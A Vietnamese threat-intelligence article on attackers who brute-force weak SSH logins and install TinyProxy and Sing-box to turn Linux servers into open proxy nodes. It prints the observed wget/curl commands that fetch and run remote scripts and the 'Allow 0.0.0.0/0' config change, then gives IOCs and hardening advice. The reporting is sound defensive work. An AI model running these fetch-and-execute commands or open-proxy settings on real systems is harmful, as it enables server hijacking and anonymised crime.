Khai Thác Máy Chủ Linux: Tấn Công Proxy Với TinyProxy Và Sing-box

02/07/2025
6 mins read
Nội dung
Phân tích Các Cuộc Tấn Công Proxy Server trên Linux
Chi tiết Kỹ thuật về Kịch bản Khai thác TinyProxy
Phương thức Xâm nhập và Triển khai TinyProxy
Cấu hình TinyProxy cho Mục đích Độc hại
IOC liên quan đến Khai thác TinyProxy
Chi tiết Kỹ thuật về Kịch bản Khai thác Sing-box
Công cụ và Giao thức được sử dụng
Mục đích và Tác động của việc lạm dụng Sing-box
IOC liên quan đến Khai thác Sing-box
Phân tích Mục đích và Tác động Chung
Mục tiêu tập trung vào mạng lưới Proxy
Thách thức trong Phát hiện
Các Biện pháp Giảm thiểu và Phòng ngừa
Tăng cường Bảo mật SSH
Quản lý Lỗ hổng và Cập nhật Hệ thống
Triển khai Kiểm soát Truy cập Mạng
Sử dụng Giải pháp Bảo mật Toàn diện

Phân tích Các Cuộc Tấn Công Proxy Server trên Linux

Các nhóm tấn công đang tích cực khai thác các máy chủ Linux được quản lý kém, đặc biệt là những máy chủ có thông tin đăng nhập SSH yếu, để cài đặt các công cụ proxy như TinyProxySing-box. Trung tâm Tình báo An ninh AhnLab (ASEC) đã theo dõi sát sao các cuộc xâm nhập này thông qua các honeypot mô phỏng dịch vụ SSH dễ bị tấn công.

Những phát hiện của ASEC cho thấy một chiến lược tinh vi, nơi những kẻ tấn công tái sử dụng các công cụ hợp pháp cho mục đích độc hại, biến các hệ thống bị xâm nhập thành các nút proxy. Mục tiêu chính là che giấu danh tính trong các cuộc tấn công mạng tiếp theo, thực hiện các hoạt động bất hợp pháp, hoặc kiếm lợi nhuận thông qua việc bán quyền truy cập vào các nút proxy này trên các thị trường ngầm.

Các cuộc tấn công này nhấn mạnh nhu cầu cấp thiết về các biện pháp bảo mật mạnh mẽ trên các môi trường Linux được kết nối với Internet công cộng. Việc lạm dụng các công cụ hợp pháp như một phần của chuỗi tấn công cũng làm phức tạp quá trình phát hiện, bởi vì bản thân các công cụ này không phải là độc hại.

Chi tiết Kỹ thuật về Kịch bản Khai thác TinyProxy

ASEC đã phân tích hai mô hình tấn công riêng biệt. Trong kịch bản đầu tiên, những kẻ tấn công tập trung vào việc khai thác các máy chủ SSH có thông tin đăng nhập yếu để giành quyền truy cập trái phép.

Phương thức Xâm nhập và Triển khai TinyProxy

Sau khi thành công trong việc truy cập vào máy chủ đích thông qua các cuộc tấn công brute-force vào SSH, kẻ tấn công sẽ triển khai một script Bash độc hại. Script này thường được tải xuống từ các URL kiểm soát bởi kẻ tấn công, sử dụng các lệnh phổ biến như wget hoặc curl.

wget hxxps://0x0[.]st/8VDs.sh -O /tmp/setup_tinyproxy.sh
chmod +x /tmp/setup_tinyproxy.sh
/tmp/setup_tinyproxy.sh

Script Bash này được thiết kế để tự động cài đặt TinyProxy, một máy chủ proxy nhẹ, sử dụng các trình quản lý gói phù hợp với hệ điều hành của máy chủ bị xâm nhập, chẳng hạn như apt (trên Debian/Ubuntu), yum (trên CentOS/RHEL) hoặc dnf (trên Fedora).

Cấu hình TinyProxy cho Mục đích Độc hại

Sau khi cài đặt TinyProxy, script sẽ tiếp tục sửa đổi tệp cấu hình của nó. Vị trí phổ biến của tệp cấu hình này là /etc/tinyproxy/tinyproxy.conf hoặc /etc/tinyproxy.conf. Mục tiêu của việc sửa đổi là loại bỏ các quy tắc kiểm soát truy cập mặc định và chèn chỉ thị “Allow 0.0.0.0/0”.

Ví dụ về thay đổi trong tệp cấu hình:

# Mặc định có thể có dòng như:
# Allow 127.0.0.1
# Allow 192.168.0.0/16

# Dòng được kẻ tấn công thêm vào để cho phép truy cập từ mọi địa chỉ IP:
Allow 0.0.0.0/0

Sự thay đổi này cho phép truy cập không giới hạn từ bên ngoài vào cổng 8888 (cổng mặc định của TinyProxy), biến máy chủ bị lây nhiễm thành một proxy mở hoàn toàn. Điều này cho phép kẻ tấn công và các bên khác sử dụng máy chủ làm điểm trung gian để che giấu nguồn gốc các hoạt động mạng độc hại của họ.

Để đảm bảo proxy duy trì hoạt động ngay cả sau khi hệ thống khởi động lại, kẻ tấn công cũng thiết lập các cơ chế duy trì. Điều này đảm bảo khả năng khai thác liên tục mà không cần truy cập lại thủ công.

IOC liên quan đến Khai thác TinyProxy

  • URL của script độc hại: hxxps://0x0[.]st/8VDs.sh

Chi tiết Kỹ thuật về Kịch bản Khai thác Sing-box

Trong một trường hợp song song, những kẻ tấn công đã triển khai Sing-box, một công cụ proxy đa giao thức mã nguồn mở. Sing-box nổi bật với khả năng hỗ trợ nhiều giao thức proxy tiên tiến.

Công cụ và Giao thức được sử dụng

Các lệnh được quan sát trong các cuộc tấn công này bao gồm việc tải xuống các script cài đặt từ các nguồn như kho lưu trữ GitHub.

curl -sS hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh | bash

Sing-box là một công cụ mạnh mẽ hỗ trợ các giao thức như vmess-argo, vless-reality, Hysteria2TUICv5. Ban đầu, nó được thiết kế để vượt qua các hạn chế Internet ở một số khu vực, cho phép người dùng truy cập các dịch vụ bị chặn như ChatGPT hoặc Netflix.

Mục đích và Tác động của việc lạm dụng Sing-box

Trong bối cảnh các cuộc tấn công này, Sing-box bị lạm dụng nghiêm trọng. Bằng cách cài đặt nó trên các máy chủ riêng ảo (VPS) ở nước ngoài bị xâm nhập, những kẻ tấn công có thể đang tìm cách sử dụng các máy chủ này cho các hoạt động bất hợp pháp hoặc kiếm tiền bằng cách bán quyền truy cập vào các nút proxy.

Việc sử dụng các VPS ở nước ngoài giúp kẻ tấn công che giấu nguồn gốc các cuộc tấn công và làm phức tạp quá trình truy vết của cơ quan chức năng. Các giao thức đa dạng mà Sing-box hỗ trợ cũng cung cấp tính linh hoạt cao cho kẻ tấn công trong việc định tuyến lưu lượng mạng độc hại.

IOC liên quan đến Khai thác Sing-box

  • URL của script cài đặt Sing-box: hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh

Phân tích Mục đích và Tác động Chung

Sự vắng mặt của các payload độc hại bổ sung trong cả hai trường hợp TinyProxy và Sing-box cho thấy ý định tập trung vào việc xây dựng một mạng lưới máy chủ proxy. Điều này là một xu hướng đáng lo ngại, trong đó phần mềm hợp pháp bị lạm dụng cho các mục đích độc hại.

Mục tiêu tập trung vào mạng lưới Proxy

Thay vì triển khai ransomware, mã độc đào tiền điện tử hay các phần mềm gián điệp, kẻ tấn công lại chọn biến các máy chủ bị xâm nhập thành các điểm trung chuyển lưu lượng. Điều này chỉ ra rằng mục tiêu chính của chúng là thiết lập một hạ tầng mạng lưới proxy quy mô lớn, có thể được sử dụng để:

  • Che giấu danh tính trong các cuộc tấn công mạng phức tạp khác, như DDoS, phát tán spam, hoặc lừa đảo.
  • Bán quyền truy cập vào các nút proxy này trên các thị trường chợ đen, cung cấp dịch vụ ẩn danh cho các tội phạm mạng khác.
  • Truy cập và khai thác các dịch vụ bị giới hạn địa lý hoặc yêu cầu ẩn danh cao.

Thách thức trong Phát hiện

Việc sử dụng các công cụ hợp pháp như TinyProxy và Sing-box đặt ra thách thức đáng kể cho việc phát hiện và phòng ngừa. Các giải pháp bảo mật truyền thống có thể khó khăn trong việc phân biệt giữa việc sử dụng hợp pháp và lạm dụng, vì bản thân các công cụ này không chứa mã độc. Sự bất thường nằm ở cấu hình và lưu lượng mạng mà chúng xử lý. Điều này đòi hỏi các hệ thống giám sát cần có khả năng phân tích hành vi và cấu hình sâu hơn để nhận diện các hoạt động đáng ngờ.

Các Biện pháp Giảm thiểu và Phòng ngừa

Để giảm thiểu rủi ro từ các cuộc tấn công như trên, các quản trị viên máy chủ phải ưu tiên áp dụng các biện pháp bảo mật mạnh mẽ. Việc bảo vệ các máy chủ Linux được kết nối với Internet là yếu tố then chốt để ngăn chặn chúng trở thành công cụ cho các mạng lưới tội phạm mạng.

Tăng cường Bảo mật SSH

  • Sử dụng Mật khẩu Mạnh và Phức tạp: Triển khai chính sách mật khẩu yêu cầu độ dài tối thiểu, bao gồm kết hợp chữ hoa, chữ thường, số và ký tự đặc biệt. Tránh sử dụng mật khẩu dễ đoán hoặc thông tin cá nhân.
  • Sử dụng Xác thực Dựa trên Khóa SSH: Thay vì chỉ dựa vào mật khẩu, hãy cấu hình SSH để sử dụng cặp khóa công khai/riêng tư. Điều này cung cấp một lớp bảo mật mạnh mẽ hơn và chống lại các cuộc tấn công brute-force hiệu quả hơn. Khóa riêng tư phải được bảo vệ bằng mật khẩu (passphrase) mạnh.
  • Vô hiệu hóa Đăng nhập Root Trực tiếp qua SSH: Cấm đăng nhập trực tiếp bằng tài khoản root qua SSH và thay vào đó yêu cầu người dùng đăng nhập bằng tài khoản thông thường rồi sử dụng sudo để thực hiện các tác vụ quản trị.
  • Thay đổi Cổng SSH Mặc định: Mặc dù không phải là biện pháp bảo mật chính, việc thay đổi cổng 22 mặc định của SSH sang một cổng không tiêu chuẩn có thể giảm số lượng các cuộc tấn công quét cổng tự động nhắm vào SSH.

Quản lý Lỗ hổng và Cập nhật Hệ thống

  • Cập nhật Định kỳ: Đảm bảo hệ điều hành và tất cả các phần mềm (bao gồm kernel, thư viện, dịch vụ) luôn được cập nhật phiên bản mới nhất. Điều này giúp vá các lỗ hổng bảo mật đã biết mà kẻ tấn công có thể khai thác.
  • Sử dụng Quản lý Patch Tự động/Bán tự động: Triển khai các công cụ hoặc quy trình tự động để kiểm tra và áp dụng các bản vá bảo mật ngay khi chúng có sẵn.

Triển khai Kiểm soát Truy cập Mạng

  • Cấu hình Tường lửa (Firewall): Triển khai và cấu hình tường lửa (ví dụ: iptables, ufw, firewalld) để hạn chế truy cập không mong muốn vào máy chủ. Chỉ cho phép các cổng và dịch vụ cần thiết được mở cho các địa chỉ IP đáng tin cậy.
  • Nguyên tắc Đặc quyền Tối thiểu: Áp dụng nguyên tắc đặc quyền tối thiểu cho tất cả các dịch vụ mạng và người dùng.

Sử dụng Giải pháp Bảo mật Toàn diện

  • Giải pháp Antivirus/EDR cho Linux: Triển khai các giải pháp bảo mật đầu cuối (Endpoint Detection and Response – EDR) được thiết kế cho môi trường Linux để phát hiện và phản ứng với các hoạt động độc hại, bao gồm cả việc lạm dụng các công cụ hợp pháp.
  • Giám sát và Ghi nhật ký: Thiết lập hệ thống giám sát liên tục và ghi nhật ký hoạt động (log) của hệ thống. Phân tích nhật ký để phát hiện các mẫu truy cập bất thường, cố gắng đăng nhập thất bại, hoặc thay đổi cấu hình không được phép.
  • Hệ thống Phát hiện Xâm nhập (IDS/IPS): Triển khai IDS/IPS để theo dõi lưu lượng mạng và phát hiện các mẫu tấn công hoặc hành vi đáng ngờ.